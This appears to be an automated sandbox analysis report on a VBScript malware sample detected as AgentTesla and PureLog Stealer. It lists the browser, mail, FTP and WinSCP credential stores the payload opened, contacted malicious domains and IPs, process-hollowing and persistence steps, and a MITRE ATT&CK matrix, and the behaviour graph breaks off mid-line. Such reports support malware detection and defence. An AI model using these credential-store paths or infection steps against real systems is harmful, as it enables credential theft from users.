                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.000000000301A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3176, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b1711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.401c190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5850000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.Native_neworigin.exe.91e438.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4256478.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200f08.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5770000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.3ebc190.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.Native_neworigin.exe.897ac8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.Native_neworigin.exe.897ac8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a76216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.3140000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a7711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a76216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4255570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4255570.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b16216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5770000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80f08.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4256478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a96216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a7711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b1711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.3140000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.42ac190.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.42ac190.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.Native_neworigin.exe.91e438.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160f08.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a9711e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.3ebc190.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160f08.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_neworigin.exe.7f6968.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a96216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b16216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_neworigin.exe.7f6968.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555146769.0000000003140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.2364237623.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413558815.0000000005850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3563552557.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3561235753.0000000002AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3564025665.0000000005770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3563972191.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.2491911126.0000000000897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2553213718.0000000002F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3176, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3562156396.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.000000000301A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 3176, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b1711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.401c190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5850000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.Native_neworigin.exe.91e438.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4256478.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200f08.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5770000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.3ebc190.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.Native_neworigin.exe.897ac8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.Native_neworigin.exe.897ac8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a76216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.3140000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a7711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a76216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.401c190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a9711e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4255570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4255570.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b16216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5770000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80f08.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.4256478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a96216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2a7711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b1711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.3140000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.5200000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.42ac190.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.42ac190.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.Native_neworigin.exe.91e438.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc6478.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160f08.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a9711e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Native_neworigin.exe.2f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.3ebc190.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.3fc6478.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.5160f08.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_neworigin.exe.7f6968.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Native_neworigin.exe.2a96216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Native_neworigin.exe.2b16216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.3.Native_neworigin.exe.7f6968.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2555146769.0000000003140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.2364237623.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413558815.0000000005850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3563552557.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3561235753.0000000002AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3564025665.0000000005770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3563972191.0000000005160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.2491911126.0000000000897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2553213718.0000000002F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information121
                      Scripting                      		1
                      Valid Accounts                      		121
                      Windows Management Instrumentation                      		121
                      Scripting                      		1
                      DLL Side-Loading                      		21
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Valid Accounts                      		11
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules                      		1
                      Valid Accounts                      		1
                      Access Token Manipulation                      		4
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      System Network Connections Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Exploitation for Client Execution                      		1
                      Windows Service                      		1
                      Windows Service                      		1
                      Software Packing                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object Model21
                      Input Capture                      		4
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		1
                      Timestomp                      		LSA Secrets47
                      System Information Discovery                      		SSH1
                      Clipboard Data                      		25
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media1
                      Scheduled Task/Job                      		21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Query Registry                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote Services2
                      Service Execution                      		Startup Items21
                      Registry Run Keys / Startup Folder                      		211
                      Masquerading                      		DCSync261
                      Security Software Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Valid Accounts                      		Proc Filesystem151
                      Virtualization/Sandbox Evasion                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow2
                      Process Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                      Virtualization/Sandbox Evasion                      		Network Sniffing1
                      Application Window Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                      Process Injection                      		Input Capture1
                      System Owner/User Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                      System Network Configuration Discovery                      		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559226 Sample: IBKB.vbs Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 95 zlenh.biz 2->95 97 vjaxhpbji.biz 2->97 99 46 other IPs or domains 2->99 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 Malicious sample detected (through community Yara rule) 2->115 117 15 other signatures 2->117 11 wscript.exe 2 2->11         started        15 Juqmtmya.PIF 2->15         started        17 Juqmtmya.PIF 2->17         started        signatures3 process4 file5 77 C:\Users\user\AppData\Local\Temp\x.exe, PE32 11->77 dropped 139 Benign windows process drops PE files 11->139 141 VBScript performs obfuscated calls to suspicious functions 11->141 143 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->143 145 Suspicious execution chain found 11->145 19 x.exe 1 7 11->19         started        147 Writes to foreign memory regions 15->147 149 Allocates memory in foreign processes 15->149 151 Sample uses process hollowing technique 15->151 24 aymtmquJ.pif 15->24         started        153 Machine Learning detection for dropped file 17->153 26 aymtmquJ.pif 17->26         started        signatures6 process7 dnsIp8 101 gxe0.com 198.252.105.91, 443, 49704, 49705 HAWKHOSTCA Canada 19->101 71 C:\Users\Public\Libraries\aymtmquJ.pif, PE32 19->71 dropped 73 C:\Users\Public\Libraries\Juqmtmya, data 19->73 dropped 75 C:\Users\Public\Juqmtmya.url, MS 19->75 dropped 127 Machine Learning detection for dropped file 19->127 129 Drops PE files with a suspicious file extension 19->129 131 Writes to foreign memory regions 19->131 133 3 other signatures 19->133 28 aymtmquJ.pif 4 19->28         started        31 cmd.exe 1 19->31         started        33 esentutl.exe 2 19->33         started        35 Native_neworigin.exe 24->35         started        39 Trading_AIBot.exe 24->39         started        41 Native_neworigin.exe 26->41         started        43 Trading_AIBot.exe 26->43         started        file9 signatures10 process11 dnsIp12 79 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 28->79 dropped 81 C:\Users\user\...81ative_neworigin.exe, PE32 28->81 dropped 45 Trading_AIBot.exe 28->45         started        49 Native_neworigin.exe 15 2 28->49         started        52 esentutl.exe 2 31->52         started        54 conhost.exe 31->54         started        83 C:\Users\Public\Libraries\Juqmtmya.PIF, PE32 33->83 dropped 56 conhost.exe 33->56         started        103 yunalwv.biz 208.100.26.245, 50019, 50028, 80 STEADFASTUS United States 35->103 105 xlfhhhm.biz 47.129.31.212, 50011, 50040, 80 ESAMARA-ASRU Canada 35->105 109 6 other IPs or domains 35->109 119 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 35->119 121 Tries to steal Mail credentials (via file / registry access) 35->121 123 Tries to harvest and steal ftp login credentials 35->123 125 2 other signatures 35->125 107 172.234.222.138, 49839, 49844, 49907 AKAMAI-ASN1EU United States 41->107 file13 signatures14 process15 dnsIp16 85 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 45->85 dropped 155 Antivirus detection for dropped file 45->155 157 Machine Learning detection for dropped file 45->157 159 Uses schtasks.exe or at.exe to add and modify task schedules 45->159 173 2 other signatures 45->173 58 powershell.exe 45->58         started        61 apihost.exe 45->61         started        63 schtasks.exe 45->63         started        89 s82.gocheapweb.com 51.195.88.199, 49771, 49926, 49953 OVHFR France 49->89 91 lpuegx.biz 82.112.184.197, 49770, 49777, 49925 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 49->91 93 5 other IPs or domains 49->93 161 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 49->161 163 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 49->163 165 Tries to steal Mail credentials (via file / registry access) 49->165 87 C:\Users\Public\alpha.pif, PE32 